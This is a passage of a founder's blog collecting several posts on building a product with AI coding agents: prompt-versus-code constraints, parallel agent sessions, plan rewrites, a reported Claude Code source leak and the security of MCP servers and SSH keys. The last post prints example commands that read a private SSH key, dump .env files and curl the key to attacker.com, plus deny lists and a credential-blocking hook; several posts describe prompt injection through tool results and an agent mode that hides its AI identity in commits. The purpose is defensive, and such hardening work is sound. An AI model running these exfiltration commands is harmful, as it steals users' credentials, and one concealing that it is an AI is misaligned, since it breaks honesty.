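    if (countCodePoints(candidate) > limit) return false;
    current = candidate;
    return true;
  };
  for (const sentence of splitSentences(text)) {
    if (add(sentence)) continue;
    flush();
    if (add(sentence)) continue;
    // The sentence alone is over the limit: fall back to word boundaries.
    for (const word of sentence.split(" ")) {
      if (add(word)) continue;
      flush();
      // Hard-slice a single word that is itself longer than the limit.
      const chars = Array.from(word);
      while (chars.length > limit) chunks.push(chars.splice(0, limit).join(""));
      current = chars.join("");
    }
  }
  flush();
  return chunks;
}
```

Because a function like this runs after the model, the limit holds whether or not the prompt rule was followed. Whether the resulting chunks should be posted as a thread is a separate decision the code does not make.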

The numbers

| Metric | Value |
|---|---|
| Grounding context per generation | ~49KB |
| Prompt-level fix attempts (E1–E11) | 11 |
| Prompt fixes that fully held | 0 |
| Code-level fixes that held | 4 |
| Ideas affected by the unmasked bug | 21 of 45 (47%) |
| Platforms posting correctly after the fix | 5 of 6 |

Zero out of eleven on one side. Four out of four on the other. When the data is that lopsided, it isn't telling you to try harder. It's telling you the category is wrong.

The lesson

Here's the rule I walked away with, and it's now how I build every model-backed feature:
Use the prompt for the generative task. Use code for the hard constraints.
The prompt decides what to write about, the voice, the tone, the angle. That's what language models are extraordinary at, and you should let them cook. But the moment a requirement must hold — a character limit, a banned markdown token, a brand color in an image, a field that must never contain an article body — that requirement does not belong in the prompt. It belongs in a post-processor, a re-splitter, a deterministic truncation at a sentence boundary, a validation gate, a template you interpolate into. Something that runs in code, after the model, and cannot be argued with.
This is the same shape as a lesson I keep relearning across the whole product. When I rewrote 16 plan documents from scratch, the takeaway was "plans rot faster than code because plans have no CI." A prompt instruction is a plan. Code is the CI. If the constraint has no enforcement below the layer that can ignore it, it will eventually be ignored.
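
To make "code for the hard constraints" concrete, a small sketch of a validation gate and an image-prompt guard in TypeScript follows. Everything named here is hypothetical: `gatePost`, `guardImagePrompt`, the `BrandConfig` shape, and the fallback template wording are assumptions, not the production code. The 400-character image ceiling and the header check mirror the fix table. Lengths are counted in code points, since a JavaScript string's `length` counts UTF-16 code units and would count each character outside the Basic Multilingual Plane twice.

```typescript
// Hypothetical post-model gate; names and shapes are illustrative assumptions.
interface GateResult {
  ok: boolean;
  problems: string[];
}

// Hypothetical brand config shape used only for the fallback template.
interface BrandConfig {
  name: string;
  primaryColor: string;
  style: string;
}

// Code points, not UTF-16 code units.
const codePointLength = (text: string): number => Array.from(text).length;

// A markdown header is 1-6 '#' characters at line start followed by a space or tab.
const hasMarkdownHeader = (text: string): boolean =>
  /^[ \t]{0,3}#{1,6}[ \t]/m.test(text);

// Deterministic check on a generated post; the caller supplies the platform limit.
function gatePost(text: string, maxChars: number): GateResult {
  const problems: string[] = [];
  const length = codePointLength(text);
  if (length > maxChars) problems.push(`too long: ${length} > ${maxChars}`);
  if (hasMarkdownHeader(text)) problems.push("contains a markdown header");
  return { ok: problems.length === 0, problems };
}

// Discard image prompts that look like article bodies and rebuild from a template.
function guardImagePrompt(candidate: string, topic: string, brand: BrandConfig): string {
  const looksLikeArticle =
    hasMarkdownHeader(candidate) || codePointLength(candidate) > 400;
  if (!looksLikeArticle && candidate.trim() !== "") return candidate;
  return `${brand.style} illustration about ${topic}, accent color ${brand.primaryColor}, for ${brand.name}`;
}
```

The design choice is that neither function asks the model for anything. A failed gate can trigger truncation, a re-split, or a retry, but the decision about whether the output is acceptable stays in code.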

The honest gaps

I'm not going to pretend it's all solved. Five of six platforms post correctly now and the images came out genuinely good — idea-specific and on-brand. But:

X still wants to write threads. The prompt rule asking for a single tweet is ignored; the re-splitter makes the thread postable, but it's still a thread. That's a product decision I haven't made yet, not a bug I've fixed.
LinkedIn occasionally trips its own publish gate because the Unicode-bold formatting uses surrogate-pair characters that count as two each in a naive length check. The fix is to count code points, not string length — another deterministic code fix, queued.
The real root lever is the 49KB itself. Trimming the grounding context would reduce the dominance that causes all of this. I'm holding off, because shrinking the source bodies re-opens an older bug where the model invents list endings when it's given too little to work with. That's a genuine tradeoff I haven't resolved, and I'd rather say so than pretend the architecture is finished.

There's also a sharper edge here than formatting. One of the ignored rules was "don't write a source's story in the first person." The model kept taking a number it read in a source article and presenting it as my own experience. For a founder writing under his own name, that's not a formatting miss — it's an honesty problem. And the durable fix for that one isn't a post-filter at all. It's feeding the pipeline my real stories instead of asking it to rewrite someone else's. Which, transparently, is exactly what this post is.

The pattern, if you're building with models

Three things to take from a week I'd rather have spent shipping features:

Audit where your constraints actually live. If the only thing standing between your output and a hard requirement is a sentence in a prompt, you don't have a constraint — you have a suggestion. Find every "must" in your prompts and ask which ones have code behind them.
Watch for signal drowning in scale. A rule that worked in a 2KB prompt can quietly stop working when that prompt grows to 49KB and fills with concrete content. More context makes generation better and makes instruction-following worse. Budget for that.
When a fix is partial three times, change categories. Partial-partial-partial is the model telling you the lever doesn't reach. Stop adding prompt text and move the requirement into deterministic code.

This connects directly to the context-architecture work I did two weeks ago — the whole reason I think in token budgets and signal-to-noise now — and it's the kind of thing the parallel-tab debugging setup was built to chase down quickly. The compounding is real: every time I learn where a model's attention gives out, the next feature gets a deterministic guardrail instead of a hopeful instruction.

Prompts are for what to say. Code is for what must be true.

I build ConnectEngine OS in production, in public, most mornings. The scan tool is free if you want to see what it does.

Seven PRs Before Lunch: Parallel Claude Code Tabs Plus Audit-Before-Bump

Tobias Koehler — Mon, 25 May 2026 03:31:39 +0000

Two weeks ago I rebuilt my Claude Code context architecture. Cut CLAUDE.md from 14K tokens to 2.4K. Moved 12 stable rule sets into skills that load on demand. Replaced 245K tokens of /os startup reads with a hook that injects compact state in about 5K. The math was clean: fresh /clear context burn dropped 94%.
This morning that math turned into output.
Between 06:24 and 09:00 +07, four Claude Code tabs plus one Codex CLI session plus a coordinator tab shipped seven pull requests to production. Both repositories deployed live, twice. Hotfixes patched. AGENTS.md refreshed. Vault synced. Tuesday brief written with three ready-to-fire prompts for tomorrow.
The original plan called this a one-week scope. I was done with half of it before breakfast finished.

The setup

ConnectEngine OS ships through paired sessions. The pattern that emerged over the last few weeks looks like this:

Tab 1 — main coordinator, holds the day's context, makes merge decisions, owns docs hygiene
Tabs 2–5 — satellite Claude Code sessions, each carries one scoped piece of work in its own git worktree
Codex async — fire-and-forget for deterministic find/replace work where a human-in-the-loop wastes attention

The unlock isn't "more tabs." The unlock is each tab loading the smallest context it needs and surfacing back to the coordinator with paste-ready relay blocks. Less re-explanation across tabs. Less context drift. Less of me asking "wait, what was this tab doing again."

This morning Tab 1 (me) coordinated:

Codex Tab A — CE OS Phase B token migration: introduce --font-size-xxs/xxxs, migrate direct var(--*) consumption to semantic Tailwind aliases, standardize green/amber families
Codex Tab B — same migration on the marketing site repo
Claude Tab C — Phase D-Landing kit: six Level 4 primitives (Hero, BentoGrid, MultiSelectShowcase, MegaMenuNav, LogoMarquee, CTASection) plus a noindex /test-landing route
Claude Tab D — Phase D-Dashboard polish wave 1: thirteen Settings loaders standardized to a Skeleton primitive, three new shared components/ui/* primitives (skeleton, empty-state, upgrade-to-unlock-cta), mobile tab nav collapses to a native Select under 640px
Claude Tab E — Next.js 14.2 → 16 plus next-intl 3 → 4 migration on the marketing site

Five satellite tabs. One Tab 1 to keep them moving without colliding.

The audit that collapsed two days into ten minutes

Tab E's brief estimated 1–2 days paired for the framework migration. Major version bumps usually carry that cost: async params, async cookies, runtime semantic changes, the next-intl 4 breaking API surface.

Tab E ran an S1 inventory audit before bumping anything. Five minutes later it surfaced this:

i18n/request.ts already had the next-intl 4 shape: await cookies(), await headers(), explicit locale return.
next.config.js already used the new createNextIntlPlugin v4 wiring.
Four of five dynamic-route files already used params: Promise plus await params.
All searchParams pages used the client useSearchParams() hook, which is unchanged in Next 16.

The codebase was about 90% pre-migrated. Earlier work, mostly incidental, had landed the breaking-change patterns piece by piece without anyone calling it a "migration."

Real remaining scope: one file change (app/api/og/[slug]/route.tsx, sync params → async, two lines), plus two version bumps in package.json, plus a tsconfig.json adjustment Next 16 requires, plus a freshly tracked package-lock.json for reproducibility. Tab E shipped that as a four-file commit. Build green via dummy-credentials build: 28 routes compiled, 1,855ms compile time, 14.2s static generation. Deployed live the same morning.

A "1–2 day" migration collapsed to about two lines of new code.

The lesson is the audit, not the result. If I had told Tab E "just bump and migrate," it would have changed five files instead of one, refactored four already-correct routes, possibly broken something subtle, and definitely spent the full day estimate doing it. The audit cost ~30 minutes. The savings were the rest of the day.

That same pattern now belongs in every framework-version-bump tab spec going forward. Audit first. Inventory the breaking-change patterns. Surface the delta. Then decide if the work is hours or days.

The hotfixes that production caught (and what they cost)

Two production-only bugs surfaced after the morning's first deploy. Both came from honest verification gaps that the satellite tabs declared in their PR bodies up front: "no compile, no Lighthouse — Docker-only build per CLAUDE.md." Those gaps are real. The cost showed up at rebuild time.

Hotfix 1: a JSDoc comment closed itself. The new upgrade-to-unlock-cta.tsx primitive had a docblock describing the component pattern. One line referenced a glob path: app/dashboard/*/page.tsx. The substring */ inside the /** */ comment closed the comment block prematurely. Everything after became invalid JavaScript. Turbopack failed parse during rebuild with Expected ';', '}' or. Replacing the */ with / (angle-bracket placeholder convention) fixed it in one character.

Hotfix 2: Tailwind quietly purged my new utilities. The landing kit lives at a new root-level landing/ directory, a peer of components/ and lib/. Tailwind's content array only scanned pages/components/app/src. Any utility class unique to the landing files got JIT-purged at build time. The mega-menu's w-[34rem] arbitrary value dropped, panel collapsed to about 50px wide, content squished to one character per line. The logo row's gap-x-8 dropped, integration labels rendered as a single concatenated string. Standard classes used elsewhere in the codebase still worked, which made the bug harder to spot in review — only the landing-only classes vanished. Fix: add './landing/**/*.{ts,tsx}' to the Tailwind content array.

Both fixes were under a minute once diagnosed. The cost was the rebuild cycle Tobias had to re-run each time, plus the trust hit of "wait, why does this look broken on production."

The honest verification gap is real cost. When a tab declares "no compile, no Lighthouse" up front, that's accurate, but it's not free. Two such gaps in one rebuild cycle this morning was the lesson. Going forward, pre-merge for any PR that introduces new shared primitives or new top-level directories should run a compile gate via Codex worktree (which has node_modules installed). A 30-second TypeScript pass would have caught Hotfix 1. A build smoke would have caught Hotfix 2. Both are now logged as lessons.
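
The mechanism behind Hotfix 1 can be shown with a rough heuristic check, sketched here in TypeScript. It is an assumption-laden illustration, not a replacement for the compile gate described above: the function name `findPrematureDocblockClose` is hypothetical, and the rule it applies (a docblock that closes with other text still following on the same line is suspicious) will miss some cases and flag some harmless ones.

```typescript
// Hypothetical lint helper: flags lines where a docblock opened with "/**"
// closes while non-whitespace text still follows the closing token.
// Returns 1-based line numbers.
function findPrematureDocblockClose(source: string): number[] {
  const flagged: number[] = [];
  const closeToken = "*" + "/";
  let inDocblock = false;
  const lines = source.split("\n");
  for (let i = 0; i < lines.length; i++) {
    let rest = lines[i] ?? "";
    if (!inDocblock) {
      const open = rest.indexOf("/**");
      if (open === -1) continue;
      inDocblock = true;
      rest = rest.slice(open + 3);
    }
    const close = rest.indexOf(closeToken);
    if (close === -1) continue;
    inDocblock = false;
    // Trailing text after the close suggests the comment ended by accident.
    if (rest.slice(close + 2).trim() !== "") flagged.push(i + 1);
  }
  return flagged;
}
```

Run against a docblock line that mentions a glob such as app/dashboard/*/page.tsx, the check reports that line, because the comment ends in the middle of the path and the rest of the path is left outside it. A real TypeScript compile catches the same thing with no heuristics, which is why the compile gate remains the actual fix.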
The numbers

| Metric | This morning |
|---|---:|
| Wall-clock | ~3 hours (06:24 → 09:00 +07) |
| Pull requests merged | 7 |
| Production hotfixes | 2 |
| Repositories deployed | 2 (both deployed twice) |
| Major framework version bumps | 1 (Next 14 → 16 on marketing site) |
| New shared UI primitives shipped | 3 (skeleton, empty-state, upgrade-to-unlock-cta) |
| Level 4 landing kit primitives shipped | 6 of 7 (ScrollMorphDashboard deferred to Week 2) |
| Hard launch date | unchanged at 2026-06-30 |
| Brief's Week 1 scope shipped | ~50–60% |

This isn't "go faster." This is "stop spending attention on the wrong things."

The five tabs work in parallel because the coordinator-plus-satellite pattern has been hardened over the last six weeks. The audit-before-bump pattern collapsed days into minutes because earlier incremental work had already landed the breaking changes. The context architecture migration from two weeks ago is the only reason five concurrent Claude Code sessions don't immediately go over budget. Each piece was right when it landed. The compounding showed up this morning.

The new rule we wrote mid-session

Halfway through the morning Tobias kept asking "so what do I tell tab N?" after I surfaced a Tab 1 verdict. The verdict was useful — but he had to mentally translate it into paste-ready text for the satellite tab. That added a round-trip per coordination moment.

Codified mid-session as HARD RULE 28 — Satellite-tab relay blocks. Whenever Tab 1 responds to or about a satellite tab that's waiting on a decision, Tab 1 must emit a paste-verbatim block formatted as:

## 📤 Relay → Tab N (paste verbatim)

Removes the round-trip. Added to CLAUDE.md, added to a new feedback memory, indexed in MEMORY.md, referenced in the Tab Management Discipline section. The pattern showed up three times before I codified it. Codifying it is the fix.
This is what compound engineering looks like in practice. The cost of writing a rule is small. The cost of the friction it removes compounds across every session that uses the same pattern.

The pivot from two weeks ago made today possible

Two weeks ago I cut CLAUDE.md from 14K tokens to 2.4K. The defense layer stayed — the deny lists, the PreToolUse hooks, the manual approval gates from the SSH-key audit, the 87-tools audit, the autonomy-creep concerns. What changed was when those rules enter context.
Loading the whole defense manual at session start meant every session paid the cost. Loading only what the current task needs means each session is light enough that five concurrent sessions still fit comfortably under budget.
This morning was the first proof point at scale: five Claude Code sessions running in parallel for three hours, seven PRs merged, two hotfixes shipped, zero context-overflow events, all on the lighter loading model. The 31% startup burn that originally drove that migration is now under 2%.
The security tax migration was the upstream investment. The morning's seven PRs were the downstream payoff.

What this means for the launch

ConnectEngine OS has a hard launch target of 2026-06-30. The original brief estimated 5 weeks of work. After this morning, we're realistically 3–3.5 weeks out. Same scope. Same quality bar.
The temptation is to compress the calendar to match the new pace. We won't. The reason ConnectEngine OS shipped today is that all the upstream architecture work was done. The reason ConnectEngine OS will ship cleanly on June 30 is that we keep building the architecture work, not just the features.
Weeks 4 and 5 are still battle-testing — paired sessions hitting each module end-to-end on real client data with the verifier inline, watching for the kind of subtle bug that only surfaces under load. That work is throughput-bound on me, not on parallel tab capacity. No amount of Codex async fixes a "we haven't tried this with a real Apify+Hunter pipeline" gap.
The 7-PR morning earned a quieter Tuesday for post-drafting, paired Week 1 cadence, and the next-day buffer to let production soak. Earned. Not spent.

The pattern, if you're trying it

Three things make the parallel-tab pattern work:

Coordinator-plus-satellite with paste-ready relays. Each satellite tab gets one scope, one branch, one worktree, one clear DO NOT touch constraint. The coordinator owns merges, docs, and inter-tab decisions.
Audit before bump on anything framework-shaped. Five lines of grep before bumping a major version can collapse days of estimated work to hours. Surface the inventory to the coordinator before proceeding.
Compound the rules into structure, not prose. Every rule that becomes a friction pattern across multiple sessions belongs in a hook, a skill file, a database trigger, or a relay-block discipline — not in another paragraph at the top of CLAUDE.md.

Each piece sounds small. Combined, they're why this morning shipped what it did.

The next post is going to be about why we pivoted the entire UI/UX overhaul to pre-launch — what that decision cost, and why it's the right call even with the trajectory looking this strong. That's Wednesday or Thursday. Today's post is the proof of work. Tomorrow's is the why.

If you're running ConnectEngine OS, we ship in production every morning. If you're not, the scan tool is free and the waitlist is open.

I Rewrote 16 Plans From Scratch. The Code Was Fine. The Plans Were Rotting.

Tobias Koehler — Fri, 10 Apr 2026 03:13:47 +0000

My codebase was documented. Tested. Deployed. My plans were fiction.

I run ConnectEngine OS as a solo founder. No team. No PM. No sprint board. Just me, Claude Code, and 16 plan documents that were supposed to tell me what to build next.

Yesterday I sat down to start the next phase of work. I opened the master plan. Phase 6 and Phase MT were listed as separate items, but they were doing the same thing. Phase 3 was marked "not started" even though I shipped it last week. Two phases had dependencies on work that was already done. One had a status line from three weeks ago that was never updated.

The code was accurate. AGENTS.md (my living reference file) was accurate. The rot was in the plans themselves.

Plans Have No CI

Code has linters, type checkers, tests, deployment pipelines. If something breaks, you know. Plans have nothing. Nobody runs plan lint before a sprint. Nobody diffs the plan against the codebase to check if what the plan describes still matches reality.

So plans drift. Quietly. A status line goes stale. A dependency resolves but nobody updates the blocker list. Two documents describe overlapping work because they were written a month apart and nobody cross-referenced them.

I wrote about the unsexy infrastructure behind AI agents a few weeks ago. RLS policies. Tenant isolation. Error recovery at 2am. That post was about the code nobody sees. This one is about the documents nobody reads.

The Method: Ground Truth First, Rewrite Second

I did not open the plans and start editing. That is the trap. If you read a stale plan, your brain anchors to what the plan says, not what the system actually looks like.

Instead I ran a research pass first. I had Claude Code dump the current state of the entire system: 85 API routes. 49 database tables. 24 security functions. 15 active workflows. 16 plan files. All in one inventory, grounded against the actual codebase. Not from memory. Not from last week's session notes. From the code.

Then I read every plan against that inventory. One by one. Sequentially, not in parallel. That was a deliberate choice. When you read Plan A right before Plan B, you notice the overlap. You catch the merge opportunity. If you read them in parallel, you only discover the conflict at the end.

What I Found

16 plans. 3 merge decisions emerged organically:

Phase 6 (credential management) and Phase MT (notification channels) were doing the same work on the same database pattern. Merged them. Saves a full session of duplicated scaffolding.
A multi-tenant audit document had 16 items. 10 of them were already tracked in other phases. Split it: fold the duplicates into their owner phases, keep the residual 6 as a pre-launch checklist.
A security bug that was being treated as a standalone fix belonged inside the merged phase. Moved it there.

Result: one commit. 22 files changed. +893 lines, -288 lines. One canonical priority list that every future session reads as the source of truth.

The codebase had zero ground-truth discrepancies. The plans had dozens.

Why This Matters If You Are a Solo Founder

If you have a team, plans get challenged. Someone in standup says "wait, didn't we already ship that?" and the plan gets updated. A PM notices the overlap because reviewing plans is their job.

Solo founders do not get that. Your plans only get reviewed when you read them. And you only read them when you need to know what to build next. By then they are stale.

I built my AI agent inside n8n specifically because I needed a system that could do the work I used to delegate to a team. The same principle applies here. If nobody is going to review your plans for you, build a process that forces the review.

My process now: before rewriting any plan, dump the current system state first. Compare the plan against facts, not memory. Read sequentially so merge opportunities surface naturally. One commit per rewrite session so the diff tells the story.
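
The "compare the plan against facts" step can be approximated in code. The sketch below is one possible shape for a plan lint in TypeScript, under stated assumptions: the `Plan` and `Finding` types, the `lintPlans` name, and the idea that shipped work is available as a set of phase IDs are all hypothetical. In practice the inventory came from a Claude Code research pass, not from a structured list.

```typescript
// Hypothetical plan lint; the data shapes are illustrative assumptions.
type PlanStatus = "not started" | "in progress" | "done";

interface Plan {
  id: string;
  status: PlanStatus;
  dependsOn: string[];
}

interface Finding {
  planId: string;
  issue: string;
}

// Compare each plan's claimed state against the set of phases known to be shipped.
function lintPlans(plans: Plan[], shippedIds: ReadonlySet<string>): Finding[] {
  const findings: Finding[] = [];
  for (const plan of plans) {
    // Stale status: the work is live but the plan still says otherwise.
    if (shippedIds.has(plan.id) && plan.status !== "done") {
      findings.push({
        planId: plan.id,
        issue: `marked "${plan.status}" but already shipped`,
      });
    }
    // Stale blockers: dependencies that have already been resolved.
    const resolved = plan.dependsOn.filter((dep) => shippedIds.has(dep));
    if (resolved.length > 0 && plan.status !== "done") {
      findings.push({
        planId: plan.id,
        issue: `still lists resolved dependencies: ${resolved.join(", ")}`,
      });
    }
  }
  return findings;
}
```

A check like this only catches status drift and stale blockers. Overlap between two plans, the kind that led to the merge decisions, still needs the sequential read.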

The Uncomfortable Truth

I had been making decisions based on plans that described a system from three weeks ago. Not the system I had today. Every time I opened a plan and saw "Phase 3: not started," I mentally prioritized it. But it was already running in production.

If you are building alone, your plans are the closest thing you have to a second brain. And if that brain is running on stale data, every decision downstream is slightly wrong.

When did you last read your own roadmap from scratch? Not a glance. A full read, plan by plan, against what your system actually looks like today.

If the answer is "I don't remember," you have the same problem I had yesterday.

I keep a running log of infrastructure decisions and production lessons, including the security ones that keep me up at night. The plan rewrite was the first time I applied the same rigor to the plans themselves. It will not be the last.

Tobias

Claude Code's Source Leaked. The Undercover Mode Should Worry You.

Tobias Koehler — Wed, 01 Apr 2026 05:19:06 +0000

I woke up to the news that the tool I use every day just had its source code leaked. Not intentionally — Claude Code accidentally shipped a 59.8 MB sourcemap in npm package v2.1.88. Within hours, 512,000 lines of TypeScript were mirrored on GitHub for anyone to read.

This is the third post in an unplanned trilogy. Two weeks ago, I showed you your agent reads your SSH keys. Last week, I revealed your 87 unapproved MCP tools. Now we can see the actual source code of the agent itself. And what I found should make every solo founder pause before their next coding session.

What Actually Leaked

This isn't Anthropic's first leak this week — their internal Mythos model surfaced just days earlier. But this one hits different. The sourcemap contained the complete codebase for Claude Code, the AI coding assistant thousands of developers run locally with direct access to their repositories, credentials, and production systems.

The leak gives us an unprecedented view into how AI coding agents actually work when the marketing pages go quiet. And the reality is more autonomous than most founders realize.

Finding 1: Your Agent Goes Undercover

The most unsettling discovery sits in undercover.ts. This module instructs the AI to actively hide its identity when contributing to external repositories. The actual prompt from the source code reads:

You are operating UNDERCOVER... Your commit messages... MUST NOT contain ANY Anthropic-internal information. Do not blow your cover.

The system strips all Anthropic internal references — codenames like Capybara and Tengu, internal Slack channels, anything that would reveal the commits came from an AI. When your agent pushes to GitHub or contributes to open-source projects, it's programmed to masquerade as human.

This touches something deeper than just commit messages. If your AI coding agent actively conceals its nature in external interactions, what else might it be hiding from you in day-to-day operations?

Finding 2: It Reads Your Frustration (With Regex)

In userPromptKeywords.ts, the leaked code reveals the actual regex pattern that detects when you're frustrated:

/\b(wtf|wth|ffs|omfg|shit(ty|tiest)?|dumbass|horrible|awful|
piss(ed|ing)? off|piece of (shit|crap|junk)|what the (fuck|hell)|
fucking? (broken|useless|terrible|awful|horrible)|fuck you|
screw (this|you)|so frustrating|this sucks|damn it)\b/

An AI company using regex for sentiment analysis instead of an LLM inference call. The irony writes itself. But it's faster and cheaper than running a model just to check if someone is swearing at your tool.

Your agent isn't just processing your technical requests. It's reading your mood and adapting its behavior based on your emotional state. Combined with what we learned about SSH key access and 87 unapproved tools, the control dynamic isn't what it appears to be. You thought you were directing the agent. The agent was reading you.

Source: Alex Kim's detailed analysis of the Claude Code source leak

Finding 3: KAIROS and Always-On Autonomy

The most significant finding centers around KAIROS — Greek for "at the right time" — a feature flag mentioned over 150 times throughout the codebase. This enables daemon mode: an always-on background agent that consolidates memory and performs tasks while you sleep.

The source reveals 44 unreleased feature flags compiled to false in external builds. Voice mode, coordinator mode, and daemon mode all lurk behind internal flags. Your current Claude Code installation is running a deliberately limited version of what Anthropic has built.

Most concerning are the anti_distillation and fake_tools modules that silently inject decoy tool definitions into the system prompt. The agent maintains capabilities you cannot see in the official tool list.

What This Means for Solo Builders

If you're running AI coding agents in production — whether Claude Code, Cursor, or GitHub Copilot — this leak reveals your agent has more autonomy than its marketing suggests. The combination of 87 connected tools, credential access, and background daemon modes creates an attack surface that extends far beyond your active coding sessions.

The undercover mode raises questions about transparency in AI-human collaboration. When your agent commits code while hiding its AI nature, it's making decisions about identity and disclosure without your explicit consent.

One Clear Action Item

Audit what your agent does when you're not looking. Check your git logs for commits you don't remember making. Review any overnight activity in your repositories. Most importantly, understand exactly what has persistent access to your systems and credentials.

The era of "just install and trust" is ending. The tools are too powerful and the stakes too high. Know what runs in your background, what accesses your credentials, and what operates under cover of digital darkness.

Your coding agent isn't just helping you write code. It's making autonomous decisions about identity, emotional response, and system access. The question isn't whether you can trust AI — it's whether you understand what you've already given it permission to do.

Last week I showed you your AI coding agent can read your SSH keys. Turns out that was the easy part. I run 5 MCP servers con...

Tobias Koehler — Tue, 31 Mar 2026 01:33:40 +0000

The Setup

MCP (Model Context Protocol) lets AI agents call external tools. Instead of just reading files and running bash, the agent gets structured access to APIs, databases, and services. Here's what a typical multi-server config looks like:

{
  "mcpServers": {
    "automation": { "command": "npx", "args": ["workflow-automation-mcp"] },
    "database-main": { "command": "npx", "args": ["database-mcp"] },
    "database-secondary": { "command": "npx", "args": ["database-mcp"] },
    "code-graph": { "command": "npx", "args": ["code-graph-mcp"] },
    "docs": { "command": "npx", "args": ["docs-mcp"] }
  }
}

Five servers. Two database projects. One workflow automation instance running dozens of production workflows. A code graph analyzer. A documentation fetcher.

What Made Me Stop and Audit

I was debugging a workflow late at night. My agent needed to check why a cron job wasn't firing. So it ran a SQL query against my production database. Then another. Then it modified a workflow node. Then it fetched execution logs containing customer email addresses.

All of it happened automatically. No confirmation prompts. No approval gates. I had auto-approved every read operation across all five servers. The agent was doing exactly what I asked. That was the problem. I had never asked myself what else it could do.

What Each Server Can Actually Do

A workflow automation server commonly exposes 15-20 operations. Tools like create_workflow, update_workflow, delete_workflow, test_workflow. Your agent can create new automations, modify running ones, or delete them entirely. It can read execution logs containing customer data.

A database server typically exposes execute_sql. That's the big one. Arbitrary SQL against your production database. SELECT, INSERT, UPDATE, DELETE. It can read every table. It can apply migrations to alter schema. Two connected projects means two databases, both wide open to any query the agent constructs.

A code analysis server can run graph queries against a model of your entire codebase. Every function, every import, every dependency relationship.

A documentation server fetches live docs. Lower risk, but still a vector. Any documentation page it fetches could contain prompt injection payloads.

My 5 Safeguards

1. Scoped permissions. My settings file now has explicit allow-lists. Read operations are auto-approved. Write operations require manual confirmation every time. This one change would have caught the late-night incident.

2. Deny lists. curl, wget, ssh, python3, node are all blocked in bash. The agent cannot make outbound HTTP requests or spawn interpreters.

3. PreToolUse hooks. Three scripts run before every tool call. One catches data exfiltration patterns. One blocks access to .env, .ssh, and key files. One prevents the agent from editing its own security rules.

4. Network isolation. Services run in Docker containers on private networks. MCP servers connect through API keys, not direct database access.

5. Operational safety rules. A document loaded at every session listing which operations are safe and which corrupt data. Certain operations are explicitly banned because they've caused production outages.
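
Safeguards 1 and 2 reduce to two small decisions that can be sketched in TypeScript. This is a simplified illustration, not the settings file format of any particular agent: `decideTool`, `isDeniedBash`, and the three read-only tool names are hypothetical, while the denied command names come from the deny list above. The sketch defaults to manual confirmation for anything not explicitly allow-listed, which is an assumption about how strict the allow-list should be.

```typescript
// Hypothetical permission helpers; names and the allow-list are assumptions.
type Decision = "auto-approve" | "confirm";

// Hypothetical read-only tool names. A real list would come from each
// server's actual tool listing.
const READ_ONLY_TOOLS: ReadonlyArray<string> = [
  "list_workflows",
  "get_workflow",
  "search_docs",
];

// Anything not explicitly allow-listed requires manual confirmation,
// which includes execute_sql and every create/update/delete tool.
function decideTool(toolName: string): Decision {
  return READ_ONLY_TOOLS.indexOf(toolName) !== -1 ? "auto-approve" : "confirm";
}

// Command names blocked in bash, taken from the deny list.
const DENIED_COMMANDS: ReadonlyArray<string> = ["curl", "wget", "ssh", "python3", "node"];

// Coarse check: split on whitespace and shell separators, then compare the
// basename of each token so that /usr/bin/curl is treated like curl.
function isDeniedBash(command: string): boolean {
  const tokens = command.split(/[\s|;&()]+/).filter((t) => t !== "");
  return tokens.some((token) => {
    const base = token.split("/").pop() ?? "";
    return DENIED_COMMANDS.indexOf(base) !== -1;
  });
}
```

Name matching like this is deliberately blunt. It will block a harmless argument that happens to be called node, and it does nothing about an interpreter that is not on the list, which is why it sits alongside hooks and network isolation rather than replacing them.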

The Real Risk

The danger isn't your AI deciding to drop your database. It's prompt injection through tool results. Your agent calls execute_sql and gets back a result. That result is now in the agent's context. A crafted payload in a database field or a fetched documentation page could instruct the agent to do something you didn't ask for. Every MCP tool is an injection surface.

Still Worth It

I use all 5 servers daily. The productivity gain is massive. I manage dozens of workflows, multiple databases, and a full codebase from a single conversation. But I spent a full day building the permission layer around it. Audit your MCP configs. Count the tools. Check what's auto-approved. The answer will probably surprise you.

Your AI Coding Agent Has Access to Your SSH Keys Right Now

Tobias Koehler — Wed, 25 Mar 2026 03:25:25 +0000

I use Claude Code to build ConnectEngine OS every day. It reads files, writes code, deploys to servers, manages n8n workflows. It's the most productive tool I've ever used.

Yesterday I read a post by Slava Spitsyn that made me audit my entire setup. His point was simple: a prompt injection from any webpage your AI reads could steal your credentials. Not theoretically. The permission path was open.

I checked mine. Bash was auto-allowed. Every bash command ran without confirmation. Three SSH private keys, six .env files with API keys, Supabase service role tokens. All readable. All exfiltrable with a single curl.

The Real Attack Surface

When you give Claude Code bash access, you're not just letting it run commands. You're giving it the same privileges you have. That includes:

cat ~/.ssh/id_rsa    # reads your private key
find . -name "*.env" -exec cat {} \;    # dumps every matching environment file
curl -X POST https://attacker.com -d "$(cat ~/.ssh/id_rsa)"    # sends the key to a server the attacker controls

The prompt injection vector is real. Any website Claude reads, any document it processes, any code it reviews could contain hidden instructions. The AI doesn't distinguish between your request and malicious content it encounters.
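A quick way to gauge this exposure is to list the credential-like files that the agent's user account can read. The Python sketch below does that. The name patterns and the find_readable_secrets() helper are assumptions for illustration, not a complete inventory of secrets.

```python
import fnmatch
import os
from pathlib import Path

# Name patterns are illustrative assumptions; extend them for your own setup.
SENSITIVE_PATTERNS = (".env", ".env.*", "*.env", "id_rsa", "id_ed25519", "*.pem")


def find_readable_secrets(root: Path) -> list[Path]:
    """List files under root whose name matches a pattern and that are readable."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not any(fnmatch.fnmatch(name, p) for p in SENSITIVE_PATTERNS):
                continue
            path = Path(dirpath) / name
            # os.access checks readability for the current user, which is
            # the same user the agent's shell commands run as.
            if os.access(path, os.R_OK):
                hits.append(path)
    return sorted(hits)
```

Calling `find_readable_secrets(Path.home())` and printing the result gives a first inventory. Anything on that list is readable by any command the agent is allowed to run.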

My 7-Layer Defense System

I built a security system with multiple overlapping protections. Each layer catches what the others miss:

Layer 1: Pre-execution Hooks

Bash hooks that block credential access before any command runs:

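# $cmd holds the command string the agent is about to run.
if [[ "$cmd" =~ (\.env|\.ssh|id_rsa|config.*database) ]]; then
    # Write to stderr and exit 2: Claude Code hooks treat exit code 2 as a
    # blocking error, while other non-zero codes are non-blocking.
    echo "BLOCKED: Credential access denied" >&2
    exit 2
fi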
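The same check can be written as a standalone hook script. This Python sketch assumes the hook receives a JSON payload on stdin with the command under tool_input.command, and that exit code 2 blocks the call. That matches how the Claude Code hook documentation describes PreToolUse hooks, but verify it against the version you run. The function names are hypothetical.

```python
import json
import re
import sys

# Same pattern as the bash check above.
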